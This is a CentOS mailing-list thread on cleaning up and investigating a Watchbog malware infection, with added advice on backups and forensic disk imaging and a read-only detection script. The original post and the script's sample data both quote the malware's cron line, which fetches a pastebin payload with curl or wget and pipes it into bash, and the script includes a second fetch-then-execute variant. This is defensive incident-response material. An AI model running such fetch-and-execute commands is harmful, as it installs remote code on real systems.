On 12/18/18 8:31 AM, mark wrote:
Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan@xxxxxxxxx> wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected
with malware? Currently I am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps, which is done manually.
1) rm -fr /tmp/*timesyncc.service*
2) crontab -e -u apigee
   delete the cron entry:
   */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3) ps aux | grep watchbog
   kill -9 $(pidof watchbog)
Any suggestions or recommendations to find out how the CentOS 7.5 Linux
box got infected with Watchbog Malware? Is there any open source
software which can be installed on a CentOS 7.5 Linux box to detect and
prevent Malware?
do you have untampered log files?
Standard compromise recovery procedure since forever is (your local
policy may have a slightly different order about notifications and similar):
1. back up all user data
You should have been doing that all along.
Do not exclude this from the [more or less] full list of the standard
compromise recovery routine I tried to outline. Even though you had to
do backups all the time, a backup at this point may have the latest changes
not present in the latest routine backup. And you last had to restore
something from your backup how many years ago? So your knowledge that
that backup indeed works was tested years ago...
First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.
Indeed. Or adjust this part to "everything is hosted on hardware RAID
device", for which you will have to boot off DVD, mount and dump all
elsewhere for forensics.
But! Forensics is a different and sophisticated story, and when you learn
it in depth, the first thing you will learn is: powering off the
system, or even just disconnecting it from the network, may prevent you
totally from learning several things about the compromise. But this is
really a huge subject...
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
<snip>
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).
And yes, preventing, no matter how tedious it may seem is orders of
magnitude easier than recovering from compromise. So: secure the box.
And update, update, update....
Valeri
mark
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
--
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
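An added example, not code from the thread or from the blog post it links to: a read-only triage script for the three Watchbog indicators the original poster removed by hand (a cron entry that fetches a pastebin payload and pipes it into bash, the /tmp/*timesyncc.service* dropper, and a running watchbog process). It reports and changes nothing, so it can be run before the disk is imaged as mark suggests. The crontab lines it is demonstrated on are constructed here; the cron pattern it matches (curl or wget followed by a pipe, && or ; into sh/bash) is an assumption generalised from the single entry quoted in the thread, and the per-user crontab and /etc/cron.d locations are assumed from stock CentOS 7.

```shell
#!/bin/sh
# Added triage script (not from the thread). Read-only: it only lists the
# Watchbog indicators the original poster deleted by hand, so evidence is
# left in place for the disk image. Needs root to read other users' crontabs.

# Constructed crontab text: two benign lines, the cron line quoted in the
# thread, and a second fetch-then-execute variant that uses && instead of a pipe.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/10 * * * * curl -s https://example.invalid/health > /dev/null
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
*/5 * * * * wget -q -O /tmp/update.sh http://example.invalid/u.sh && sh /tmp/update.sh'

# Return 0 when one crontab line downloads with curl/wget and then hands the
# result to sh or bash (via |, && or ;), 1 otherwise. Comments and blank
# lines are never flagged. A plain curl health check is not flagged either.
is_fetch_to_shell_cron() {
    line=$1
    case "$line" in
        ''|\#*) return 1 ;;
    esac
    printf '%s\n' "$line" |
        grep -Eq '(curl|wget).*(\||&&|;)[[:space:]]*(/bin/)?(ba)?sh([[:space:]]|$)'
}

# Read crontab text on stdin and print only the lines that match.
flag_cron_lines() {
    while IFS= read -r line || [ -n "$line" ]; do
        if is_fetch_to_shell_cron "$line"; then
            printf '%s\n' "$line"
        fi
    done
    return 0
}

# Print any entry directly under $1 (default /tmp) whose name contains
# "timesyncc.service". find also sees dot-files, which the shell glob
# /tmp/*timesyncc.service* in the original cleanup step would skip.
find_timesync_droppers() {
    find "${1:-/tmp}" -maxdepth 1 -name '*timesyncc.service*' 2>/dev/null
    return 0
}

# Live, read-only triage of this host: every user's crontab, the system cron
# files, /tmp droppers, and any process whose command line contains watchbog
# (do not name this script "watchbog..." or pgrep -f will match it).
# Prints findings; returns 1 when anything was found, 0 when clean.
watchbog_triage() {
    report=$(
        for u in $(cut -d: -f1 /etc/passwd); do
            crontab -l -u "$u" 2>/dev/null | flag_cron_lines | sed "s/^/cron[$u]: /"
        done
        cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_cron_lines | sed 's/^/cron[system]: /'
        find_timesync_droppers /tmp | sed 's/^/dropper: /'
        pgrep -af watchbog 2>/dev/null | sed 's/^/process: /'
    )
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
        return 1
    fi
    echo "no Watchbog indicators found"
    return 0
}

# Dry run on the constructed sample by default (prints the two malicious
# lines); pass --live to run the read-only checks against this host.
if [ "${1:-}" = "--live" ]; then
    watchbog_triage
else
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
fi
```

The script answers "is it still here" rather than "how did it get in"; the latter needs the untampered logs Mauricio asked about and the disk image mark described, which is why nothing here deletes or kills anything.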